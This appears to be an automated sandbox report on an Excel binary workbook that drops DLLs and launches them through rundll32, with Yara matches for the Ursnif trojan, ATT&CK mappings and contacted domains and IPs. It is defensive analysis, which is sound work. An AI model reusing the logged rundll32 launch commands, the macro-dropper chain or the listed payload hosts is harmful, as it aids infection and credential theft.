        Source: catalogue-41.xlsbInitial sample: CALL
        Found abnormal large hidden Excel 4.0 Macro sheetShow sources
        Source: catalogue-41.xlsbInitial sample: Sheet size: 21162
        Source: catalogue-41.xlsbInitial sample: Sheet size: 10013
        Found obfuscated Excel 4.0 MacroShow sources
        Source: catalogue-41.xlsbInitial sample: High usage of CHAR() function: 40
        Office process drops PE fileShow sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@11/11@5/5
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{DA5B546F-1D16-4FAC-AF46-1B670536C5A1} - OProcSessId.datJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/media/image1.png
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/media/image2.png
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/media/image3.png
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/media/image4.png
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
        Source: catalogue-41.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj1Jump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.41a0000.2.raw.unpack, type: UNPACKEDPE
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gifJump to dropped file
        Source: rundll32.exe, 00000002.00000002.248730159.0000000002DC0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.285120374.0000000004880000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.279717486.0000000002A00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: rundll32.exe, 00000002.00000002.248730159.0000000002DC0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.285120374.0000000004880000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.279717486.0000000002A00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: rundll32.exe, 00000002.00000002.248730159.0000000002DC0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.285120374.0000000004880000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.279717486.0000000002A00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: rundll32.exe, 00000002.00000002.248730159.0000000002DC0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.285120374.0000000004880000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.279717486.0000000002A00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: Yara matchFile source: app.xml, type: SAMPLE

        Stealing of Sensitive Information:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.41a0000.2.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000004.00000002.270814494.00000000041A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 4.2.rundll32.exe.41a0000.2.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting3Path InterceptionProcess Injection1Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        catalogue-41.xlsb2%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\fikftkm.thj1100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gif100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        thefamouscurrybazaar.co.uk0%VirustotalBrowse
        ponchokhana.com5%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://api.cortana.ai0%URL Reputationsafe
        https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
        https://directory.services.0%URL Reputationsafe
        https://directory.services.0%URL Reputationsafe
        https://directory.services.0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe
        https://staging.cortana.ai0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        thefamouscurrybazaar.co.uk
        5.100.152.162
        truefalseunknown
        ponchokhana.com
        5.100.155.169
        truefalseunknown
        ethereality.info
        108.167.180.111
        truefalse
          unknown
          springbedspetroleum.com
          50.116.95.68
          truefalse
            unknown
            devrongolf.com
            43.229.135.209
            truefalse
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                high
                https://login.microsoftonline.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                  high
                  https://shell.suite.office.com:1443C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                    high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                      high
                      https://autodiscover-s.outlook.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                        high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                          high
                          https://cdn.entity.C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://api.addins.omex.office.net/appinfo/queryC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                            high
                            https://clients.config.office.net/user/v1.0/tenantassociationkeyC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                              high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                high
                                https://powerlift.acompli.netC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://lookup.onenote.com/lookup/geolocation/v1C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                  high
                                  https://cortana.aiC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                    high
                                    https://cloudfiles.onenote.com/upload.aspxC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                      high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                        high
                                        https://entitlement.diagnosticssdf.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                          high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                            high
                                            https://api.aadrm.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                              high
                                              https://api.microsoftstream.com/api/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                  high
                                                  https://cr.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                    high
                                                    https://portal.office.com/account/?ref=ClientMeControlC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                      high
                                                      https://ecs.office.com/config/v2/OfficeC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                        high
                                                        https://graph.ppe.windows.netC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                          high
                                                          https://res.getmicrosoftkey.com/api/redemptioneventsC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://powerlift-frontdesk.acompli.netC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://tasks.office.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                            high
                                                            https://officeci.azurewebsites.net/api/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                              high
                                                              https://store.office.cn/addinstemplateC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                high
                                                                https://globaldisco.crm.dynamics.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                  high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                    high
                                                                    https://store.officeppe.com/addinstemplateC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev0-api.acompli.net/autodetectC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.odwebp.svc.msC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groupsC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                      high
                                                                      https://web.microsoftstream.com/video/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                        high
                                                                        https://graph.windows.netC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                          high
                                                                          https://dataservice.o365filtering.com/C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://officesetup.getmicrosoftkey.comC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://analysis.windows.net/powerbi/apiC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                            high
                                                                            https://prod-global-autodetect.acompli.net/autodetectC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.jsonC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                              high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                  high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonC620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                    high
                                                                                    https://ncus.contentsync.C620B1EB-48B4-4D81-8EB0-1C63D8D3D019.0.drfalse
                                                                                    • URL Reputation: safe
